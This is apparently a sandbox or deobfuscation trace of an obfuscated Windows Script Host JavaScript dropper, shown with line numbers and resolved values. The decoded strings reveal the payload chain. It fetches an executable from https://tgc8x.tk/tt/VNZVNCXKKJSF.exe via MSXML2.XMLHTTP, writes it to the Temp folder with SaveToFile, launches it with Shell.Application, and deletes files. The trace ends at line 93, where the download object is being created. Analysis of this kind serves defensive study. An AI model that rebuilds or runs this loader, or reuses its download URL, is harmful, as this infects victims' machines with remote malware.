                                                                                                                                                                                                            _0x529399['push'] ( _0x529399['shift'] ( ) );
                                                                                                                                                                                                              62
                                                                                                                                                                                                              }
                                                                                                                                                                                                                63
                                                                                                                                                                                                                }
                                                                                                                                                                                                                  64
                                                                                                                                                                                                                  } ( _0x3974, 0x66157 ) );
                                                                                                                                                                                                                    65
                                                                                                                                                                                                                    function _0x1c3e(_0x27f080, _0x17fea0) {
                                                                                                                                                                                                                    • _0x1c3e(140) ➔ "463900CaNtRp"
                                                                                                                                                                                                                    • _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                    • _0x1c3e(140) ➔ "1268392teACcP"
                                                                                                                                                                                                                    • _0x1c3e(134) ➔ "5QEmMYO"
                                                                                                                                                                                                                    • _0x1c3e(138) ➔ "76392yWuOtG"
                                                                                                                                                                                                                    • _0x1c3e(128) ➔ "279BGVghm"
                                                                                                                                                                                                                    • _0x1c3e(131) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                    • _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                    • _0x1c3e(135) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                    • _0x1c3e(117) ➔ "Open"
                                                                                                                                                                                                                    66
                                                                                                                                                                                                                    var _0x35b3aa = _0x4a61 ( );
                                                                                                                                                                                                                    • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                    • _0x4a61() ➔ Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    • _0x4a61() ➔ Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD,Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu
                                                                                                                                                                                                                    67
                                                                                                                                                                                                                    return _0x1c3e =
                                                                                                                                                                                                                      68
                                                                                                                                                                                                                      function (_0x366407, _0x13f8d0) {
                                                                                                                                                                                                                      • _0x1c3e(140,undefined) ➔ "463900CaNtRp"
                                                                                                                                                                                                                      • _0x1c3e(134,undefined) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                      • _0x1c3e(140,undefined) ➔ "1268392teACcP"
                                                                                                                                                                                                                      • _0x1c3e(134,undefined) ➔ "5QEmMYO"
                                                                                                                                                                                                                      • _0x1c3e(138,undefined) ➔ "76392yWuOtG"
                                                                                                                                                                                                                      • _0x1c3e(128,undefined) ➔ "279BGVghm"
                                                                                                                                                                                                                      • _0x1c3e(131,undefined) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                      • _0x1c3e(142,undefined) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                      • _0x1c3e(135,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                      • _0x1c3e(117,undefined) ➔ "Open"
                                                                                                                                                                                                                      69
                                                                                                                                                                                                                      _0x366407 = _0x366407 - 0x6e;
                                                                                                                                                                                                                        70
                                                                                                                                                                                                                        var _0xbb7100 = _0x35b3aa[_0x366407];
                                                                                                                                                                                                                          71
                                                                                                                                                                                                                          return _0xbb7100;
                                                                                                                                                                                                                            72
                                                                                                                                                                                                                            }, _0x1c3e ( _0x27f080, _0x17fea0 );
                                                                                                                                                                                                                              73
                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                74
                                                                                                                                                                                                                                var _0x155c25 = _0x5b6c, _0x115fc7 = _0x1c3e;
                                                                                                                                                                                                                                  75
                                                                                                                                                                                                                                  ( function (_0x16801f, _0x374a29) {
                                                                                                                                                                                                                                  • (function _0x4a61(),265012) ➔ undefined
                                                                                                                                                                                                                                  • (function _0x4a61(),265012) ➔ undefined
                                                                                                                                                                                                                                  76
                                                                                                                                                                                                                                  var _0x16324c = _0xe99d, _0x2e5130 = _0x5099, _0x319ed0 = _0x1c3e, _0x3b90fe = _0x5b6c, _0x2e4578 = _0x16801f ( );
                                                                                                                                                                                                                                  • _0x4a61() ➔ Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5qtgXxcIx3cPCog,W5pdICkQkCk1WQ53WQZdRCo6tSoA,279BGVghm,vcFcV8kjWRZdHmk4WROea0xcUa,WOZcHCkvkCo+WOXZnuxcKKbM,Scripting.FileSystemObject,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,995898DfgeKn,5QEmMYO,MSXML2.XMLHTTP,Type,W7pdMCoine3dQ8oDW6rTaczvl1e,76392yWuOtG,WRRcG8o6,1268392teACcP,xSkvWPCOWOniFvTXeCkMbCkL,\VNZVNCXKKJSF.exe,CreateObject,Position,W4NdNCkFW6WLcfzu,Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkrpSkhW6vhWRhdVSoZACoyWRXJimko,W4SFgdRcImkKWOiD
                                                                                                                                                                                                                                  77
                                                                                                                                                                                                                                  while (! ! [ ] )
                                                                                                                                                                                                                                    78
                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                      79
                                                                                                                                                                                                                                      try
                                                                                                                                                                                                                                        80
                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                          81
                                                                                                                                                                                                                                          var _0x10039f = - parseInt ( _0x3b90fe ( 0x7a, _0x2e5130 ( 0xeb, 'OS$Q' ) ) ) / 0x1 + - parseInt ( _0x3b90fe ( 0x7b, _0x2e5130 ( 0xce, 'EzL#' ) ) ) / 0x2 + - parseInt ( _0x3b90fe ( 0x8d, _0x16324c ( 0xfc ) ) ) / 0x3 + parseInt ( _0x319ed0 ( 0x8c ) ) / 0x4 * ( - parseInt ( _0x319ed0 ( 0x86 ) ) / 0x5 ) + parseInt ( _0x3b90fe ( 0x81, _0x16324c ( 0xe2 ) ) ) / 0x6 * ( parseInt ( _0x3b90fe ( 0x91, 'mh&D' ) ) / 0x7 ) + - parseInt ( _0x319ed0 ( 0x8a ) ) / 0x8 * ( parseInt ( _0x319ed0 ( 0x80 ) ) / 0x9 ) + parseInt ( _0x3b90fe ( 0x89, _0x16324c ( 0xdd ) ) ) / 0xa;
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ " ,8f`\xfa\xa1\xfd?\xf9g\x02"
                                                                                                                                                                                                                                          • parseInt(" ,8f`\xfa\xa1\xfd?\xf9g\x02") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x5b6c(123,"RY1%") ➔ "s\xa8\xc3G!k\xbdq; Ki"
                                                                                                                                                                                                                                          • parseInt("s\xa8\xc3G!k\xbdq; Ki") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x5b6c(141,"W)L8") ➔ "\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1"
                                                                                                                                                                                                                                          • parseInt("\xa91Q!\x89\xce\xc7\xf6>\xcb\x91\xf7\xd1") ➔ NaN
                                                                                                                                                                                                                                          • _0x1c3e(140) ➔ "463900CaNtRp"
                                                                                                                                                                                                                                          • parseInt("463900CaNtRp") ➔ 463900
                                                                                                                                                                                                                                          • _0x1c3e(134) ➔ "xSkvWPCOWOniFvTXeCkMbCkL"
                                                                                                                                                                                                                                          • parseInt("xSkvWPCOWOniFvTXeCkMbCkL") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(226) ➔ "4(*W"
                                                                                                                                                                                                                                          • _0x5b6c(129,"4(*W") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ "\xd2\x8e\x12\xc6"\xb2jr~hb\xdc"
                                                                                                                                                                                                                                          • parseInt("\xd2\x8e\x12\xc6"\xb2jr~hb\xdc") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x5b6c(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x5b6c(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ undefined
                                                                                                                                                                                                                                          • _0x2e5130(235,"OS$Q") ➔ "m*X5"
                                                                                                                                                                                                                                          • _0x3b90fe(122,"m*X5") ➔ "\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b"
                                                                                                                                                                                                                                          • parseInt("\xad\xd2O\xdb\x91\xd5\xc4\xa3V\xfa\x04\xefs\x0b") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\xe4\x88}") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x00\x9e\x10\xc7_vd\x1cJ\xeb\x84\xbf\xf9") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x97\xd6\x18\x03\xf96O\x13") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x98\x9es\xd5\xe6\x8d\x9a\x8c;w]\x1a{") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf"
                                                                                                                                                                                                                                          • parseInt("\x02\xd0H\x83\xabal\x81\xed\xf1\x9d\xff\xcf") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\xa3\xf6\x99\x02\xa8\xb8\xbb\x82\xa8\x94\xb4J\xdc") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "*\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9"
                                                                                                                                                                                                                                          • parseInt("*\xc5\xc7PX\x02\x89\xf5\x80lb\xd7\xf3.\x82\xd9") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x8b\xe3\x16\xd1[\xdb^\xf6\xc5 Kb\xe09\x8e\x89") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ "42NTWCLY"
                                                                                                                                                                                                                                          • parseInt("42NTWCLY") ➔ 42
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x95\x14\x9f\xd5T\x9a\x9bZ") ➔ NaN
                                                                                                                                                                                                                                          • _0x2e5130(206,"EzL#") ➔ "RY1%"
                                                                                                                                                                                                                                          • _0x3b90fe(123,"RY1%") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("\x95\x10\xe2\xb83\xe9\x94b\x0b\x11{\xc5") ➔ NaN
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ undefined
                                                                                                                                                                                                                                          • parseInt("995898DfgeKn") ➔ 995898
                                                                                                                                                                                                                                          • _0x16324c(252) ➔ "W)L8"
                                                                                                                                                                                                                                          • _0x3b90fe(141,"W)L8") ➔ "1123059fOWHRS"
                                                                                                                                                                                                                                          • parseInt("1123059fOWHRS") ➔ 1123059
                                                                                                                                                                                                                                          • _0x1c3e(140) ➔ "1268392teACcP"
                                                                                                                                                                                                                                          • parseInt("1268392teACcP") ➔ 1268392
                                                                                                                                                                                                                                          • _0x1c3e(134) ➔ "5QEmMYO"
                                                                                                                                                                                                                                          • parseInt("5QEmMYO") ➔ 5
                                                                                                                                                                                                                                          • _0x16324c(226) ➔ "4(*W"
                                                                                                                                                                                                                                          • _0x3b90fe(129,"4(*W") ➔ "428748eDivLq"
                                                                                                                                                                                                                                          • parseInt("428748eDivLq") ➔ 428748
                                                                                                                                                                                                                                          • _0x3b90fe(145,"mh&D") ➔ "42NTWCLY"
                                                                                                                                                                                                                                          • parseInt("42NTWCLY") ➔ 42
                                                                                                                                                                                                                                          • _0x1c3e(138) ➔ "76392yWuOtG"
                                                                                                                                                                                                                                          • parseInt("76392yWuOtG") ➔ 76392
                                                                                                                                                                                                                                          • _0x1c3e(128) ➔ "279BGVghm"
                                                                                                                                                                                                                                          • parseInt("279BGVghm") ➔ 279
                                                                                                                                                                                                                                          • _0x16324c(221) ➔ "vUkl"
                                                                                                                                                                                                                                          • _0x3b90fe(137,"vUkl") ➔ "17855830DsYtJo"
                                                                                                                                                                                                                                          • parseInt("17855830DsYtJo") ➔ 17855830
                                                                                                                                                                                                                                          82
                                                                                                                                                                                                                                          if ( _0x10039f === _0x374a29 )
                                                                                                                                                                                                                                            83
                                                                                                                                                                                                                                            break ;
                                                                                                                                                                                                                                              84
                                                                                                                                                                                                                                              else
                                                                                                                                                                                                                                                85
                                                                                                                                                                                                                                                _0x2e4578[_0x16324c ( 0x101 ) ] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );
                                                                                                                                                                                                                                                  86
                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                    87
                                                                                                                                                                                                                                                    catch ( _0x341c60 )
                                                                                                                                                                                                                                                      88
                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                        89
                                                                                                                                                                                                                                                        _0x2e4578['push'] ( _0x2e4578[_0x16324c ( 0xd6 ) ] ( ) );
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        • _0x16324c(214) ➔ "shift"
                                                                                                                                                                                                                                                        90
                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                          91
                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                            92
                                                                                                                                                                                                                                                            } ( _0x4a61, 0x40b34 ) );
                                                                                                                                                                                                                                                              93
                                                                                                                                                                                                                                                              var pOut = new ActiveXObject ( _0x115fc7 ( 0x83 ) ) [_0x155c25 ( 0x72, 'BQ9o' ) ] ( 0x2 ) + _0x115fc7 ( 0x8e ), Object = WScript[_0x155c25 ( 0x82, _0x56566c ( 0xe1 ) ) ] ( _0x115fc7 ( 0x87 ) );
                                                                                                                                                                                                                                                              • _0x1c3e(131) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                              • _0x155c25(114,"BQ9o") ➔ "GetSpecialFolder"
                                                                                                                                                                                                                                                              • GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp
                                                                                                                                                                                                                                                              • _0x1c3e(142) ➔ "\VNZVNCXKKJSF.exe"
                                                                                                                                                                                                                                                              • _0x56566c(225) ➔ "Bhsp"
                                                                                                                                                                                                                                                              • _0x155c25(130,"Bhsp") ➔ "CreateObject"
                                                                                                                                                                                                                                                              • _0x1c3e(135) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                                                                              • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                                                                              94
